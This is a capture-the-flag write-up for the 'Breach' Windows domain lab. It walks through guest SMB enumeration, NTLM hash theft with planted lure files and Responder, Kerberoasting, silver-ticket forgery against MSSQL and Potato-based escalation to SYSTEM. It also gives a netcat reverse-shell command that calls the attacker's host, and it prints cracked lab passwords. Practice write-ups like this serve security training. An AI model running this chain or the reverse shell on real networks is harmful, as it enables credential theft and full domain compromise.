Breach - Writeup (Vulnlab & HTB)

Anonymous SMB and NTLM theft enable Kerberoasting; forged silver tickets and MSSQL/token impersonation achieve SYSTEM.

INFO | Ports & Services

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-13 03:38:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.161.73:1433:
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
| ms-sql-info:
|   10.129.161.73:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-13T03:32:19
| Not valid after:  2055-10-13T03:32:19
| MD5:     71a0 a7d1 0415 5273 c435 a1b7 3f3c a693
| SHA-1:   33ec 70c4 bb5c f6f9 70f0 a974 0d5e 8f58 61d8 0b19
|_SHA-256: bd49 856e b83c ee10 e888 7f2e 25f5 8c3c 1080 205c 4c16 2a57 af4b 3e37 2d87 8c2f
|_ssl-date: 2025-10-13T03:39:41+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-07T08:04:48
| Not valid after:  2026-03-09T08:04:48
| MD5:     f457 54f6 0073 10ba ecb2 0f99 fca9 d035
| SHA-1:   ccc9 9cbf 5171 71cb 42e1 4951 243c e58c a229 cd36
|_SHA-256: 27dd 4b87 17d3 579e baa5 97f7 b638 7b2b ba05 ad39 fd81 d60f 4108 3a48 3602 55f8
|_ssl-date: 2025-10-13T03:39:41+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-13T03:39:01+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

FOOTHOLD

The initial nmap scan shows a single Windows domain controller, BREACHDC, for the domain breach.vl: DNS, Kerberos, LDAP, SMB, MSSQL, RDP and WinRM are all exposed on one host. I enumerated domain users by brute-forcing RIDs with netexec over an unauthenticated session (a made-up username with an empty password, which works here because the box allows guest access):

nxc smb BREACHDC.breach.vl -u 'aasdad' -p '' --rid-brute

Domain Users

Christine.Bruce
Claire.Pope
Diana.Pope
George.Williams
Hilary.Reed
Hugh.Watts
Jasmine.Price
Jasmine.Slater
Julia.Wong
Lawrence.Kaur
staff
svc_mssql

SMB Guest Allowed

Connecting as Guest over SMB and listing the shares turns up a share named share on which the guest account has both read and write permissions, which is interesting:

smbclient //10.129.161.73/share --no-pass

The share itself contains nothing useful, but write access is enough: we can plant lure files that, when a user merely browses the folder in Explorer, make their machine fetch an icon or resource from a UNC path on our host and authenticate to it with NTLM. Responder answers those connections and records the NetNTLMv2 challenge/response.

The first step is to generate the lure files in every format ntlm_theft.py supports, all pointing at our tun0 address:

python3 ntlm_theft.py -g all -s 10.10.14.42 --filename testingFiles

Then I run responder:

responder -I tun0 -Pv

Finally, I upload all the files:

prompt off
mput *

After a while, someone browses the share and Responder captures the NetNTLMv2 response of Julia.Wong.

We cracked it with hashcat (mode 5600, NetNTLMv2) and obtained the password:

JULIA.WONG --> Computer1

SMB | User.txt

Checking Julia.Wong's credentials against SMB confirms they are valid, and revisiting the share named share with them yields the user.txt flag.

Bloodhound

Like in any environment, I like to know where I stand and what permissions I have, so I collect all Active Directory objects with netexec's BloodHound collector and run them through BloodHound for analysis:

nxc ldap 10.129.161.73 -u 'JULIA.WONG' -p 'Computer1' --bloodhound -c all --dns-server 10.129.161.73

Kerberoast | SVC_MSSQL

By analyzing BloodHound, we find that the account SVC_MSSQL has a service principal name set and is therefore Kerberoastable: any domain user can request a service ticket for it, and that ticket is encrypted with a key derived from the account's password.

We carried out the Kerberoast attack, requesting the ticket as Julia.Wong:

targetedKerberoast.py -v --dc-ip 10.129.161.73 -d breach.vl -u JULIA.WONG -p 'Computer1'

Finally, we cracked the TGS-REP hash with hashcat (mode 13100, Kerberos 5 etype 23 TGS-REP):

svc_mssql -> Trustno1

MSSQLSvc

Having valid credentials, we can connect to the SQL service that we observed during the initial scan with nmap:

mssqlclient.py 10.129.161.73/svc_mssql:'Trustno1'@10.129.161.73 -windows-auth

Even though we have compromised the account, it is not a sysadmin on the instance: we can list directories with xp_dirtree, but enabling xp_cmdshell fails because the login may neither change advanced options with sp_configure nor run RECONFIGURE, and we need command execution to make a real impact:

[%] exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

Silver Ticket Abuse

We can abuse a silver ticket to escalate inside MSSQL. A service ticket for the MSSQLSvc SPN is encrypted with the long-term key of the account the service runs as, svc_mssql, whose password we now know. With that key we can forge a TGS that claims to be Administrator: the SQL service decrypts it with its own key, never consults the KDC, and accepts the identity and group membership written into the forged PAC. First, we obtain the domain SID, which goes into that PAC:

lookupsid.py 'breach.vl/svc_mssql@10.129.161.73'

S-1-5-21-2330692793-3312915120-706255856

Next, we compute the NT hash of the service account's password, which is the RC4-HMAC Kerberos key that ticketer.py takes via -nthash. The NT hash is MD4 over the UTF-16LE encoding of the password (on OpenSSL 3 hosts MD4 lives in the legacy provider, so the dgst call also needs -provider legacy -provider default):

iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4

MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c

Finally, we generated the silver ticket:

ticketer.py -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -dc-ip 10.10.77.106 -spn mssql/breachdc.breach.vl -domain breach.vl Administrator

We point KRB5CCNAME at the Administrator.ccache that ticketer.py wrote and reconnect to the MSSQL service with Kerberos authentication:

mssqlclient.py -k BREACHDC.breach.vl

This time the session is Administrator, a sysadmin on the instance.

We enable xp_cmdshell and can then run arbitrary commands on the host in the security context of the SQL Server service account. We use it to launch a reverse shell, in my case an encoded PowerShell one-liner.

PrivEsc to Administrator

Once inside the system, escalation is very easy: the shell runs as the SQL Server service account, which holds the impersonation privilege (SeImpersonatePrivilege) that the Potato family abuses, so any Potato of preference turns it into SYSTEM. Here god.exe (GodPotato) runs nc.exe to send a second reverse shell back to our host:

.\god.exe -cmd "nc.exe -e powershell.exe 10.10.14.42 8000"

Finally, we read root.txt as SYSTEM. Pwned!